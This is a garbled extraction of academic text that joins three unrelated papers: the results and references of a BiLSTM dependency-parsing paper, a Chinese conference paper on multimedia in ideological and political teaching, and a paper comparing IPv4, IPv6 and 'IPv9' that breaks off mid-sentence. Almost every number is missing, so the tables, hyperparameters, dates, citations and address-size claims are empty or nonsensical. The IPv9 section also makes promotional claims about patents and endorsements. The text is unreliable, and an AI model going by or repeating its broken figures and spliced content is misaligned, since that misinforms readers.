table : test-set parsing results of various state-of-the-art parsing systems on the english (ptb) and chinese (ctb) datasets. the systems that use embeddings may use different pre-trained embeddings. english results use predicted pos tags (different systems use different taggers), while chinese results use gold pos tags. ptb-ym: english ptb, yamada and matsumoto head rules. ptb-sd: english ptb, stanford dependencies (different systems may use different versions of the stanford converter). ctb: chinese treebank. reranking/blend in the method column indicates a reranking system where the reranker score is interpolated with the base-parser's score. the different systems and the numbers reported for them are taken from: zhangnivre: (zhang and nivre, ); martins: (martins et al., ); weiss: (weiss et al., ); pei: (pei et al., ); dyer: (dyer et al., ); ballesteros: (ballesteros et al., ); lezuidema: (le and zuidema, ); zhu: (zhu et al., ).

implementation details
the parsers are implemented in python, using the pycnn toolkit (https://github.com/clab/cnn/tree/master/pycnn) for neural network training. the code is available at the github repository https://github.com/elikip/bist-parser. we use the lstm variant implemented in pycnn, and optimize using the adam optimizer (kingma and ba, ). unless otherwise noted, we use the default values provided by pycnn (e.g., for random initialization, learning rates, etc.).

the word and pos embeddings e(w_i) and e(p_i) are initialized to random values and trained together with the rest of the parsers' networks. in some experiments, we also introduce pre-trained word embeddings. in those cases, the vector representation of a word is a concatenation of its randomly-initialized vector embedding with its pre-trained word vector. both are tuned during training. we use the same word vectors as in dyer et al. ( ).

during training, we employ a variant of word dropout (iyyer et al., ), and replace a word with the unknown-word symbol with a probability that is inversely proportional to the frequency of the word. a word w appearing #(w) times in the training corpus is replaced with the unknown symbol with probability p_unk(w) = α / (#(w) + α). if a word was dropped, the external embedding of the word is also dropped with probability . .
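as a small illustration of the word-dropout scheme just described (a sketch only; the α value and the toy corpus are assumptions, not the authors' settings), a word's replacement probability falls quickly with its training-corpus frequency:

```python
# sketch of frequency-dependent word dropout: a word seen #(w) times in training
# is replaced by the unknown symbol with probability alpha / (#(w) + alpha).
# alpha and the toy corpus below are illustrative assumptions.
import random
from collections import Counter

def word_dropout(sentence, counts, alpha=0.25, unk="<unk>"):
    out = []
    for w in sentence:
        p_unk = alpha / (counts[w] + alpha)   # rare words are dropped more often
        out.append(unk if random.random() < p_unk else w)
    return out

counts = Counter("the parser encodes the sentence with the bilstm".split())
print(word_dropout(["the", "parser", "encodes", "a", "sentence"], counts))
# "the" (frequent) is almost never replaced; "a" (unseen in the toy counts) always is
```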
we train the parsers for up to iterations, and choose the best model according to the uas accuracy on the development set.

hyperparameter tuning
we performed a very minimal hyper-parameter search with the graph-based parser, and use the same hyper-parameters for both parsers. the hyper-parameters of the final networks used for all the reported experiments are detailed in table .

table : hyper-parameter values used in experiments
word embedding dimension
pos tag embedding dimension
hidden units in mlp
hidden units in mlp_lbl
bi-lstm layers
bi-lstm dimensions (hidden/output) /
α (for word dropout) .
p_agg (for exploration training) .

main results
table lists the test-set accuracies of our best parsing models, compared to other state-of-the-art parsers from the literature. it is clear that our parsers are very competitive, despite using very simple parsing architectures and minimal feature extractors. when not using external embeddings, the first-order graph-based parser with features outperforms all other systems that are not using external resources, including the third-order turboparser. the greedy transition-based parser with features also matches or outperforms most other parsers, including the beam-based transition parser with heavily engineered features of zhang and nivre ( ) and the stack-lstm parser of dyer et al. ( ), as well as the same parser when trained using a dynamic oracle (ballesteros et al., ). moving from the simple ( features) to the extended ( features) feature set leads to some gains in accuracy for both english and chinese.

interestingly, when adding external word embeddings the accuracy of the graph-based parser degrades. we are not sure why this happens, and leave the exploration of effective semi-supervised parsing with the graph-based model for future work. the greedy parser does manage to benefit from the external embeddings, and using them we also see gains from moving from the simple to the extended feature set. both feature sets result in very competitive results, with the extended feature set yielding the best reported results for chinese, and ranked second for english, after the heavily-tuned beam-based parser of weiss et al. ( ). (unfortunately, many papers still report english parsing results using the deficient yamada and matsumoto head rules (ptb-ym) rather than the more modern stanford dependencies (ptb-sd). we note that the ptb-ym and ptb-sd results are not strictly comparable, and in our experience the ptb-ym results are usually about half a uas point higher.)

additional results
we perform some ablation experiments in order to quantify the effect of the different components on our best models (table ).

| ptb uas | ptb las | ctb uas | ctb las
graph (no ext. emb) | . | . | . | .
–pos | . | . | . | .
–arclabeler | . | – | . | –
–loss aug. | . | . | . | .
greedy (ext. emb) | . | . | . | .
–pos | . | . | . | .
–dynoracle | . | . | . | .
table : ablation experiment results (dev set) for the graph-based parser without external embeddings and the greedy parser with external embeddings and the extended feature set.

loss-augmented inference is crucial for the success of the graph-based parser, and the multi-task learning scheme for the arc-labeler contributes nicely to the unlabeled scores. dynamic oracle training yields nice gains for both english and chinese.

conclusion
we presented a pleasingly effective approach for feature extraction for dependency parsing based on a bilstm encoder that is trained jointly with the parser, and demonstrated its effectiveness by integrating it into two simple parsing models: a greedy transition-based parser and a globally optimized first-order graph-based parser, yielding very competitive parsing accuracies in both cases.

acknowledgements
this research is supported by the intel collaborative research institute for computational intelligence (icri-ci) and the israeli science foundation (grant number / ). we thank lillian lee for her important feedback and efforts invested in editing this paper. we also thank the reviewers for their valuable comments.

references
miguel ballesteros, yoav goldberg, chris dyer, and noah a. smith. .
training with explo- ration improves a greedy stack-lstm parser. corr, abs/ . . rich caruana. . multitask learning. machine learning, : – , july. danqi chen and christopher manning. . a fast and accurate dependency parser using neural networks. in proceedings of the conference on empirical methods in natural language processing (emnlp), pages – , doha, qatar, october. association for computational linguistics. jason p.c. chiu and eric nichols. . named entity recognition with bidirectional lstm-cnns. transac- tions of the association for computational linguistics, . to appear. kyunghyun cho. . natural language under- standing with distributed representation. corr, abs/ . . james cross and liang huang. . incremental pars- ing with minimal features using bi-directional lstm. in proceedings of the th annual meeting of the as- sociation for computational linguistics, berlin, ger- many, august. association for computational lin- guistics. marie-catherine de marneffe and christopher d. man- ning. . stanford dependencies manual. techni- cal report, stanford university. chris dyer, miguel ballesteros, wang ling, austin matthews, and noah a. smith. . transition- based dependency parsing with stack long short-term memory. in proceedings of the rd annual meet- ing of the association for computational linguistics and the th international joint conference on natural language processing (volume : long papers), pages – , beijing, china, july. association for com- putational linguistics. jason eisner. . three new probabilistic models for dependency parsing: an exploration. in th interna- tional conference on computational linguistics, pro- ceedings of the conference, coling , center for sprogteknologi, copenhagen, denmark, august - , , pages – . jeffrey l. elman. . finding structure in time. cog- nitive science, ( ): – . yoav goldberg and joakim nivre. . a dynamic ora- cle for arc-eager dependency parsing. in proceedings of coling , pages – , mumbai, india, de- cember. the coling organizing committee. yoav goldberg and joakim nivre. . training deterministic parsers with non-deterministic oracles. transactions of the association for computational linguistics, : – . yoav goldberg. . a primer on neural net- work models for natural language processing. corr, abs/ . . alex graves. . supervised sequence labelling with recurrent neural networks. ph.d. thesis, technical university munich. sepp hochreiter and jürgen schmidhuber. . long short-term memory. neural computation, ( ): – . liang huang and kenji sagae. . dynamic pro- gramming for linear-time incremental parsing. in pro- ceedings of the th annual meeting of the associa- tion for computational linguistics, pages – , uppsala, sweden, july. association for computational linguistics. ozan irsoy and claire cardie. . opinion mining with deep recurrent neural networks. in proceedings of the conference on empirical methods in nat- ural language processing (emnlp), pages – , doha, qatar, october. association for computational linguistics. mohit iyyer, varun manjunatha, jordan boyd-graber, and hal daumé iii. . deep unordered composi- tion rivals syntactic methods for text classification. in proceedings of the rd annual meeting of the associ- ation for computational linguistics and the th inter- national joint conference on natural language pro- cessing (volume : long papers), pages – , beijing, china, july. association for computational linguistics. andrej karpathy, justin johnson, and fei-fei li. . visualizing and understanding recurrent networks. corr, abs/ . . 
diederik p. kingma and jimmy ba. . adam: a method for stochastic optimization. in proceedings of the rd international conference for learning repre- sentations, san diego, california. eliyahu kiperwasser and yoav goldberg. . easy-first dependency parsing with hierarchical tree lstms. transactions of the association for compu- tational linguistics, . to appear. terry koo and michael collins. . efficient third- order dependency parsers. in proceedings of the th annual meeting of the association for computational linguistics, pages – , uppsala, sweden, july. asso- ciation for computational linguistics. terry koo, xavier carreras, and michael collins. . simple semi-supervised dependency parsing. in pro- ceedings of the th annual meeting of the associ- ation for computational linguistics, pages – , columbus, ohio, june. association for computational linguistics. sandra kübler, ryan t. mcdonald, and joakim nivre. . dependency parsing. synthesis lectures on human language technologies. morgan & claypool publishers. marco kuhlmann, carlos gómez-rodríguez, and gior- gio satta. . dynamic programming algorithms for transition-based dependency parsers. in proceed- ings of the th annual meeting of the association for computational linguistics: human language tech- nologies, pages – , portland, oregon, usa, june. association for computational linguistics. guillaume lample, miguel ballesteros, sandeep subra- manian, kazuya kawakami, and chris dyer. . neural architectures for named entity recognition. in proceedings of the conference of the north american chapter of the association for computa- tional linguistics: human language technologies, pages – , san diego, california, june. associ- ation for computational linguistics. phong le and willem zuidema. . the inside- outside recursive neural network model for depen- dency parsing. in proceedings of the conference on empirical methods in natural language process- ing (emnlp), pages – , doha, qatar, october. association for computational linguistics. yann lecun, sumit chopra, raia hadsell, marc’aurelio ranzato, and fu jie huang. . a tutorial on energy-based learning. predicting structured data, . tao lei, yu xin, yuan zhang, regina barzilay, and tommi jaakkola. . low-rank tensors for scor- ing dependency structures. in proceedings of the nd annual meeting of the association for compu- tational linguistics (volume : long papers), pages – , baltimore, maryland, june. association for computational linguistics. mike lewis, kenton lee, and luke zettlemoyer. . lstm ccg parsing. in proceedings of the con- ference of the north american chapter of the associa- tion for computational linguistics: human language technologies, pages – , san diego, california, june. association for computational linguistics. mitchell p. marcus, beatrice santorini, and mary ann marcinkiewicz. . building a large annotated cor- pus of english: the penn treebank. computational linguistics, ( ): – . andre martins, noah a. smith, and eric xing. . concise integer linear programming formulations for dependency parsing. in proceedings of the joint con- ference of the th annual meeting of the acl and the th international joint conference on natural lan- guage processing of the afnlp, pages – , sun- tec, singapore, august. association for computational linguistics. andre martins, miguel almeida, and noah a. smith. . turning on the turbo: fast third-order non- projective turbo parsers. 
in proceedings of the st annual meeting of the association for computational linguistics (volume : short papers), pages – , sofia, bulgaria, august. association for computa- tional linguistics. ryan mcdonald, koby crammer, and fernando pereira. . online large-margin training of dependency parsers. in proceedings of the rd annual meet- ing of the association for computational linguistics (acl’ ), pages – , ann arbor, michigan, june. association for computational linguistics. ryan mcdonald. . discriminative training and spanning tree algorithms for dependency parsing. ph.d. thesis, university of pennsylvania. joakim nivre. . incrementality in deterministic de- pendency parsing. in frank keller, stephen clark, matthew crocker, and mark steedman, editors, pro- ceedings of the acl workshop incremental parsing: bringing engineering and cognition together, pages – , barcelona, spain, july. association for com- putational linguistics. joakim nivre. . algorithms for deterministic incre- mental dependency parsing. computational linguis- tics, ( ): – . wenzhe pei, tao ge, and baobao chang. . an ef- fective neural network model for graph-based depen- dency parsing. in proceedings of the rd annual meeting of the association for computational linguis- tics and the th international joint conference on nat- ural language processing (volume : long papers), pages – , beijing, china, july. association for computational linguistics. mike schuster and kuldip k. paliwal. . bidirec- tional recurrent neural networks. ieee trans. signal processing, ( ): – . benjamin taskar, vassil chatalbashev, daphne koller, and carlos guestrin. . learning structured pre- diction models: a large margin approach. in machine learning, proceedings of the twenty-second interna- tional conference (icml ), bonn, germany, au- gust - , , pages – . hillel taub-tabib, yoav goldberg, and amir glober- son. . template kernels for dependency pars- ing. in proceedings of the conference of the north american chapter of the association for com- putational linguistics: human language technolo- gies, pages – , denver, colorado, may–june. association for computational linguistics. ivan titov and james henderson. . a latent variable model for generative dependency parsing. in proceed- ings of the tenth international conference on parsing technologies, pages – , prague, czech repub- lic, june. association for computational linguistics. ashish vaswani, yonatan bisk, kenji sagae, and ryan musa. . supertagging with lstms. in pro- ceedings of the th annual conference of the north american chapter of the association for computa- tional linguistics (short papers), san diego, califor- nia, june. oriol vinyals, lukasz kaiser, terry koo, slav petrov, ilya sutskever, and geoffrey e. hinton. . gram- mar as a foreign language. in advances in neural in- formation processing systems : annual conference on neural information processing systems , de- cember - , , montreal, quebec, canada, pages – . david weiss, chris alberti, michael collins, and slav petrov. . structured training for neural network transition-based parsing. in proceedings of the rd annual meeting of the association for computational linguistics and the th international joint conference on natural language processing (volume : long pa- pers), pages – , beijing, china, july. associa- tion for computational linguistics. yue zhang and stephen clark. . a tale of two parsers: investigating and combining graph-based and transition-based dependency parsing. 
in proceedings of the conference on empirical methods in natural language processing, pages – , honolulu, hawaii, october. association for computational linguistics.
yue zhang and joakim nivre. . transition-based dependency parsing with rich non-local features. in proceedings of the th annual meeting of the association for computational linguistics: human language technologies, pages – , portland, oregon, usa, june. association for computational linguistics.
chenxi zhu, xipeng qiu, xinchi chen, and xuanjing huang. . a re-ranking model for dependency parser with recursive convolutional neural network. in proceedings of the rd annual meeting of the association for computational linguistics and the th international joint conference on natural language processing (volume : long papers), pages – , beijing, china, july. association for computational linguistics.

international conference on sensor network and computer engineering (icsnce )
the reform and innovation of ideological and political teaching under the multimedia
xing bo, ideological and political department, xi'an peihua university, xi'an, , shaanxi, china, e-mail: @qq.com

abstract—with the continuous development of modern information technology, computer networks and multimedia technology have been used more and more widely. due to the diversity, integration, controllability, interactivity, and real-time characteristics of multimedia technology, the application of multimedia technology in teaching has greatly changed the traditional teaching mode of instilling knowledge into students in a single, simple manner. its integrated management of text, graphics, images, video, sound, etc. makes teaching intuitive, novel, diverse and vivid; it can give full play to students' thinking ability, cognitive ability and ability to analyze problems, and can greatly improve the quality of teaching. applying multimedia technology to the ideological and political course in colleges and universities can help improve the expressiveness and appeal of teaching content, inspire students' interest in learning, increase the credibility and timeliness of teaching content, and create a multidimensional interactive ideological and political classroom model. this will enable the teaching of ideological and political courses in universities to be carried out more effectively. therefore, we should effectively use multimedia technology to assist our teaching in ideological and political education.

keywords-multimedia technology; ideological and political courses in colleges and universities; reform strategy

i. introduction
with the extensive application of multimedia technology in the classroom, the ideological and political teaching in colleges and universities has radiated new vitality: from traditional chalk teaching to today's participatory teaching, and from the traditional single teaching mode to today's multi-dimensional interactive teaching mode, which has greatly improved the efficiency of ideological and political course teaching. at the same time, however, it inevitably brings about many problems. for the problems that exist when multimedia technology is used in the ideological and political class, the author puts forward some solving strategies, believing that as long as multimedia technology is used reasonably, ideological and political education in colleges and universities can become more productive. figure .
network multimedia technology assisted teaching map ii. the role of multimedia technology in the teaching of ideological and political courses a. motivate students' interest in learning in traditional ideological education courses, teachers often use sermon teaching mode, which makes classroom teaching boring and boring, so that class becomes a teacher's "one-man show", so that students lack enthusiasm and initiative, and classroom participation is extremely low. those students often do not know after class, so the quality and efficiency of teaching can not be achieved well. the famous chinese educator confucius once said, "people who understand it are not as good as those who love it, and those who love it are not as good as those who enjoy it." the interest of learning can awaken the students' thirst for knowledge and thus improve the students' learning efficiency. therefore, the ideological and political classroom with a relatively dull content should pay more attention to improving the students' interest and stimulating the curiosity of the students. with the use of new media technology, international conference on sensor network and computer engineering (icsnce ) teachers can transform teaching contents into images, sounds and characters by making ppt and so on. this relatively more novel and lively teaching methods, to help students use all kinds of sense organs participate in teaching activities, passively accept to active learning, make the ideological and political education is more interesting and stimulate the students interest in learning for ideological and political education. b. enhancing the credibility and timeliness of teaching content in the traditional ideological and political education class, because most of the teachers adopt the way of oral teaching, many of the views in the textbook are not so convinced by the students. but the multimedia can go beyond the limitations of time and space, make originally not intuitive knowledge of ideological and political teaching illustrated, by taking advantage of the news, documentaries, the chart data added the textbook knowledge, make both organically, let the students "seeing is believing", greatly increase the credibility of the teaching content. the ideological and political course in colleges and universities is a curriculum which pays great attention to timeliness. however, textbook reprinting is a very time-consuming and laborious process. this leads to the fact that only by learning textbooks cannot be made of the effect of ideological and political education to keep pace with the times .however, in the era of information technology, this situation has a new method of improvement, that is, the use of multimedia technology to innovate ideological and political education class. because multimedia has the dynamic function of spreading the political, economic, cultural and social situations in the world, so teachers can take all kinds of current hot topics on the internet as examples, keep pace with the social reality, and make ideological and political education advance with the times. c. deepening students' understanding of ideological and political issues a large part of the ideological and political problems are very abstract, and it is often difficult to be understood by the students immediately through the teacher's explanation. 
for example, it is very difficult for students to understand the "law is the inevitable connection of things, phenomena and processes", but by listing some occasional events by pictures, it is easy to deepen students' understanding of this concept through asking and answering questions with students. in fact, many abstract problems in ideological and political education can be solved by similar multimedia technology. because of the intuitive features of the multimedia technology itself, it can easily establish the connection between the content and life, and create a life situation related to the teaching content. it enables students to better understand some abstract ideological and political problems, so that students can master the difficult points in the ideological and political process without difficulty, and improve the teaching quality and efficiency of teachers. figure . multimedia technology assisting the teaching process of ideological and political course d. improving students' memory of teaching content the so-called memory "is the process of encoding, storing and extracting the input information of the outside world, which is divided into three types: instantaneous memory, short-term memory and long-term memory." in the process of ideological and political teaching, how to make the students' memory of teaching content disappear in the darkness after the "registration" in the mind, and even to the point that they have not forgotten for a long time, it has been the common pursuit of all teachers. the new media technology using the echoism tone even dynamic video several angles to promote the students' memory in teaching content, and there is conducive to students through a variety of ways to extract content. let students "bind" what they have learned in various ways to common knowledge, increase the retention rate of students' knowledge, and improve the efficiency of education teaching. iii. the problems of the application of new media technology in the ideological education course a. the content of multimedia courseware is not closely related to the teaching material teaching materials are a basic basis for teachers' learning, so the courseware made by teachers should be based on teaching materials. however, in the college ideological education class, some teachers pay too much attention to the novelty of courseware, so that they ignore the basic principles of teaching materials. multimedia technology is only a supporting tool for teaching, and it is a means for teachers to better illustrate the viewpoint of teaching materials. making courseware out of teaching materials is not only a kind of behavior that is not only to the end of the book, but also may affect the students' attention to the teaching content and hinder the students' understanding of the teaching material. in addition, in ideological education international conference on sensor network and computer engineering (icsnce ) courses in colleges and universities, the classroom teaching is only through the courseware is very serious, teachers control the multimedia courseware to recite, rather than lead students to comprehend teaching materials, the teaching process is completely out of teaching materials. in this way, not only the teacher's subjective status in the teaching is weakened, but also the humanistic care in the ideological and political teaching material can not be read. in the long run, the harm is great. b. 
the concept of teachers is old and multimedia becomes formalism contrary to the multimedia as the center, the ideological education in colleges and universities also exist such teachers, they ignore the role of multimedia in modern teaching. they always insist on teaching by preaching. they believe that the traditional way of teaching is simpler and easier to write and say. a survey shows that there is such a general situation in colleges and universities that some teachers never use multimedia technology in the normal teaching process. only when public courses are exchanged, can they open multimedia in the classroom for a long time. in this case, multimedia technology is reduced to a formalism. this situation is particularly prominent in the ideological and political teaching. in addition, the imperfect multimedia facilities in colleges and universities are also one of the reasons for this phenomenon. c. teachers become manipulators of machines, weakening students' subjectivity in the process of using ideological and political education with multimedia technology, because the courseware is prepared in advance, the teacher pays great attention to the whole context of the courseware, which leads to the teacher in the teaching process only pay attention to control the multimedia to complete the rigid teaching process and neglected the interaction with students. students often focus on copying the contents of courseware onto their notebooks, and often neglect their teacher's explanation. this is not conducive to the student's thinking in the teaching process, weakening the student's dominant position, resulting in the student's rational thinking can not be good development of. under such circumstances, multimedia is completely reduced to "instilling knowledge machine to students". it not only plays a positive role in promoting ideological and political teaching, but also hinders the emotional communication between teachers and students, making classroom teaching more dull and boring. iv. effectively using multimedia to reform ideological and political education a. the multimedia courseware should be combined with the content of the textbook as a form of better performance of the content of teaching materials, multimedia courseware must obey the contents of the teaching material and can not be divorced from the textbook. in order to stimulate students' interest and arouse students' curiosity, some teachers cite a lot of video and audio in multimedia courseware, blindly seeking novelty, ignoring the content of textbooks, and losing the humanistic care that should be contained in teaching. therefore, teachers must constantly explore how to organically combine multimedia courseware and teaching materials. the multimedia technology is applied to the teaching material and the living situation which is closely related to the content of the teaching material and the thinking characteristics of the students. teachers should use the textbook as the basis, supplemented by the life situation closely related to the content of the teaching materials, and follow the thinking characteristics of the students to use the multimedia technology. only in this way, the instrumental role of multimedia technology in university ideological and political education can be truly displayed. b. 
teachers should make full use of multimedia technology to cultivate modern talents in the modern era of information technology development, teachers should make full use of multimedia technology to improve the quality and efficiency of ideological and political teaching in colleges and universities. the teachers of the ideological and political education curriculum should get rid of the constraints of the profession and actively learn how to use a lot of media technology in the teaching class. schools should also pay attention to the popularization of multimedia classrooms, make effective use of resources, and train teachers in multimedia operations so that teachers can better use multimedia technology for daily teaching. in addition, teachers should also be practiced to use multimedia technology to teach and reasonably allocate time for use of courseware, so that multimedia can be effectively used without distracting students' attention. c. teachers should combine multimedia technology with teaching “classroom is a powerful interactive environment composed of teachers, students, and the environment. it is a systematic form of education and a unique social organization.” no matter how much multimedia technology can play a role in the ideological and political class, we can never ignore the dominant position of teachers and students. after all, multimedia technology is only used as an auxiliary tool to help teaching, which is doomed it can only be a medium to connect teachers, students and teaching materials, rather than the main body of teaching activities. especially in the teaching of ideological education, for the elaboration of viewpoints in the teaching materials, teachers cannot only use theories to convince people, and often they must also allow students to get the sublimation of their thoughts through emotional communication with students. the interaction and communication between teachers and students is an indispensable requirement for a qualified teaching activity. teachers' language and body movements, even their eyes, play an indispensable role in multimedia technology. therefore, we must not regard multimedia as omnipotent, and we must not let multimedia replace the status of teachers in teaching activities. international conference on sensor network and computer engineering (icsnce ) v. conclusion to sum up, multimedia technology plays an active role in improving teaching activities, which is an important way to improve teaching quality and stimulate students' interest in learning. the application of multimedia technology in teaching has changed the form of traditional teaching, showing the teaching contents in the form of comprehensive multimedia information, deepening the students' understanding of knowledge, and promoting the diversified and comprehensive development of teaching methods. it fully reflects the cooperative relationship between teaching and learning and arouses students' interest in learning. however, as a means of auxiliary teaching, multimedia technology is not a master key, it has its inevitable "double edge", if it is treated reasonably and used effectively, it can greatly improve the quality and efficiency of ideological and political education, on the contrary, it will only hinder the development of ideological and political teaching activities in colleges and universities. 
only by studying deeply, reasonably designing, developing and using multimedia technology, and combining it with other teaching methods, can we optimize classroom teaching and embody the real value of multimedia-technology-assisted teaching.

references
[ ] wang hongmei and zhang jianlong, "research on the combination of multimedia technology and traditional teaching methods", journal of xinjiang medical university, ( ).
[ ] zhang song, "research on construction and application of ideological and political education network system based on video on demand in colleges and universities", shenyang normal university, .
[ ] ma dandan and bai jing, "design and implementation of the comprehensive information platform for smelting enterprises", international journal of advanced network monitoring and controls, volume , no. , .
[ ] han dameng and hu wanqing, "on the problems and countermeasures of multimedia teaching in ideological and political courses in universities", professional technology, ( ).
[ ] zhang haiyan, "a survey of the status quo of college multimedia network teaching and strategies of optimizing modes", journal of changchun university of science and technology, ( ).
[ ] li yihu, "research of integration technology between catia and toolmanager based on caa", international journal of advanced network, monitoring, and controls, vol. , no. , .
[ ] wei zhang, "fuel cell test system based on avr single-chip computer", international journal of advanced network, monitoring and controls, volume , no. , .
[ ] jie huang, "research on balanced energy consumption of wireless sensor network nodes based on clustering algorithm", international journal of advanced network, monitoring and controls, volume , no. , .
[ ] jingwen chen and hongshe dang, "the design of two phase chopping regulation voltage soft starter", international journal of advanced network monitoring and controls, volume , no. , .

international journal of advanced network, monitoring and controls, volume , no. , doi: . /ijanmc- -
comparison research on future network between ipv , ipv and ipv
yury halavachou, department of the international relations, belarusian state university of transport, republic of belarus, kirova street, gomel, republic of belarus, e-mail: oms@bsut.by
xu fei, school of computer science and engineering, xi'an technological university, xi'an, china, e-mail: xinfei @qq.com

abstract—ipv is the most widely used protocol on the internet, and its address space is . in the early stage of the internet, due to the underestimation of the development of the internet, ip resources were very limited. by , there was no address left that could be allocated. in order to solve the problem of insufficient addresses, the ietf designed the next-generation ipv protocol to replace ipv . ipv has addresses in theory; however, only one-eighth of the addresses can actually be allocated to end users. at present, barcodes already have bits, which ipv cannot cover, so ipv has some considerable limitations. in , a chinese researcher proposed ipv . in order to distinguish it from ipv and ipv , the v in ipv is uppercase, not lowercase. ipv includes three technologies: a new address coding design, a new addressing mechanism and a new address architecture design.
these technologies constitute the core technology system at the bottom of the new generation ip network. the new network framework designed on this basis can form a network system that is connected and compatible with existing networks. ipv is not a simple upgrade of ipv or ipv and its address space is by default. the massive address can meet the needs of human activities about years, this paper will introduce the characteristics of the future network, and comparison the system between the ipv , ipv and ipv , and lay a solid foundation for the subsequent development. keywords-ipv ; ipv ; ipv ; future network with the rapid development of science and technology, the world has entered an information age of data communication. the most famous of the data networks is internet, a packet-switched network developed by the u.s. department of defense called the arpanet, which is considered the precursor to the information superhighway. now almost all countries and regions have joined the internet. in order for information to be transmitted correctly over the internet to its destination, each computer connected to the internet must have a unique address. at present, there are three kinds of address compilation methods: one is "ip address", which consists of four digits divided by the dot; the other is "domain name", a series of strings split by dots, and the third is "chinese domain name system", which consists of a three-level domain name split by a decimal and an oblique line. these three address structures have become the current network system; bringing great convenience to people's international journal of advanced network, monitoring and controls volume , no. , access to the internet, the network has completely changed people's lives. i. problems with ipv and ipv a. problems with ipv ) insufficient address internet uses ipv protocol address scheme, the address number up to , due to the early development of the internet to estimate the development trend of internet, the ip allocation is not reasonable, address resources are exhausted, although no classification of addressing cidr technology, network address translation nat technology to alleviate the crisis, but still can't solve the problem. and address will be more and more widely used in e-commerce logistics code, space code, identity code, digital currency, three-dimensional geographical code and other intelligent terminals, the original address allocation technology cannot meet the needs of social development. ) route table expansion the topology of address space directly results in the form of address allocation independent of the network topology. with the increase of the number of networks and routers, the excessively expanded routing table increases the search and storage overhead and becomes the bottleneck of the internet. at the same time, the length of packet head is not fixed, and it is very inconvenient to extract, analyze and select routes by hardware, so it is difficult to improve the throughput of routing data. then there is the uneven distribution of ip addresses. due to its origin in the united states, more than half of all addresses are owned by the united states, resulting in a serious imbalance in the distribution of ip addresses. ) lack of quality of service (qos) ipv was originally designed for military use, and was not intended to be open to the outside world. 
as a result, qos of quality of service and security were very poor, and it was difficult to provide rich qos functions for real-time multimedia, mobile ip and other commercial services. although the later developed protocols such as rsvp provided qos support, the cost of planning and constructing ip network was relatively high. despite of its shortcomings, ipv was the first network all over the world, and people had got to used it, so it will going forever. b. problems with ipv the length of ipv is bits, or addresses. the address space is much larger than the -bit address space. moreover, the principle of aggregation is adopted, which enables the router to represent a subnet with an entry in the routing table, it greatly reducing the length of routing table in the router and improving the speed of forwarding packets. the addition of multicast support and flow control over ipv has led to significant advances in multimedia applications, providing a good network platform for, quality of service control (qos). despite its obvious advantages, ipv has a big flaw in the design of its address structure. the shortcomings are as follows. ) structural hierarchy disorder ipv confuses the network hierarchy in the design, and the interface id inserts the physical address into the logical address layer, which on the one hand results in the physical address space forming a limitation on the empty ip address, the security does not belong to the content of the ip layer, it is not necessary to design security technology in the ip layer. because with the development of security technology, security methods and key length will change constantly, so the development of security technology will eventually lead to the need for ip address redesign. ) ambiguous address space in the unicast address with more ipv applications, the structure of "network id+ host id" similar to ipv is adopted from a large point of view, and the network international journal of advanced network, monitoring and controls volume , no. , id of ipv is changed into a three-layer more structure with a fixed length of subnet prefix: "top-level aggregation id+ secondary aggregation id+ site-level aggregation id". ipv is a kind of patchwork addressing. so its address space is not pure bits. ipv address space is not the -bit address space that people think of. due to the special address structure design, ipv itself has to go through three significantly different version transitions if it wants to truly implement the -bit address space, the ipv for -bit effective address space; ipv for -bit valid address space. the transition between the three versions is like to upgrade the three different protocols. ) incompatible with ipv ip address is the basic protocol of the internet, and it is very difficult to solve it through complete replacement. initially, without further study, the designers of ipv decided that the -address space problem of ipv could not be solved by a smooth upgrade, so they simply redesigned it entirely from scratch. ipv requires all nodes of the entire network to support the new ip protocol, and all terminal operating systems and applications to support upgrades, making the problem extremely difficult. these shortcomings are also the main reason why ipv has not been widely used since its emergence. ii. future network ipv a. 
process of ipv in december , xie jianping, a scholar from shanghai, china and the inventor of the future network, applied to the national intellectual property administration (nipa), prc (formerly the patent office of china) for the invention patent of "the method of assigning addresses to computers connected to the network with full digital codes", which was officially authorized by the nipa on november , . in december , mr. xie jianping registered the copyright in the national copyright administration of china in “the method of unified compilation and distribution of addresses of networked computers and intelligent terminals”, “the overall distribution method of computer addresses allocated by full decimal algorithm for networked computers”, and “the gateway of decimal number”. in october , the “copyright of ipv protocol and application” was registered. in , the former science and technology department of the ministry of industry and information technology of china established the china decimal network standards working group (ipv working group) with enterprises as the main body and industry, university and research institute as a combination. in , the “code for digital domain names” was published, defining the "decimal network, ipv resource record and management organization". in , the former ministry of industry and information technology of china formally defined ipv as the "future network" to distinguish the next generation of the internet for ipv . in , the authoritative professional institutions of the us government have confirmed legally and technically that china has the core technology of sovereign network with independent intellectual property rights under the ip framework. this is the patented technology of ipv which is different from the existing technology of the us internet. the official patent name is "method of using whole digital code to assign address for computer". in december , the u.s. federal patent and trademark office issued a patent certificate numbered us , , , stating in its notice of approval that the applicant's identification report was "very convincing". international journal of advanced network, monitoring and controls volume , no. , on may , and march , , the united states twice voted in favor of the china-led "naming and addressing" and "security" of the future network. on february , , the state council issued the national science and technology infrastructure construction medium and long term plan ( - ), in order to break through the future network basic theory and support the new generation of internet experiments, the construction of future network test facilities. on june , , the ministry of industry and information technology of china released relevant industry standards for ipv implemented nationwide: including sj/t "for products and services based on the technology of radio frequency domain rules", "sj/t decimal network based rfid tag information orientation, query and service discovery technology standard", sj/t "used digital id format in information processing products and services", sj/t "the network architecture of rfid tags information query service specification", sj/t "based on the electronic tag information of decimal network location, query and service discovery and application". b. 
about ipv ipv is completely independent intellectual property rights on the basis of full decimal digit code, it has of cyberspace sovereignty, including from mother root, master root, root name servers, using zero trust security communication mechanism after verification first, compatible with the current internet system, with overlapping geographical position and the ip address space for the future network architecture. on the basis of compatibility with all the functions of the internet at present, ipv adopts the tcp/ip/m three-layer and four-layer hybrid architecture, with mixed virtual and real circuits, to complete the video data transmission of large code stream. ipv obtained chinese patent in (cn ), and has obtained authorized patents successively in more than ten countries and regions, including south africa, turkey, kazakhstan, russia, south korea, north korea, hong kong, canada, singapore, australia, mexico and norway. ipv applied for us patent in . it was issued seven times of "non-final rejection opinion" and six final rejections by the us patent office. during this period, it was repeatedly criticized by senior members of the us ietf and famous american it companies. in december , the us patent and trademark office officially issued a patent certificate numbered us , , , and clearly stated in its approval notice that the appraisal report provided by the applicant was “very convincing”. in december , the us patent and trademark office officially issued a patent certificate numbered us , , , and clearly stated in its approval notice that the appraisal report provided by the applicant was "very convincing". iii. special characteristics of ipv ) address space is huge ipv has a larger address space than ipv /ipv . ipv defines the bit length of ip address is , that is, there are - addresses; while the length of ipv is , that is, - addresses, the standard length of an ipv address is - , with layers address structure design will be - ( - ). to put it 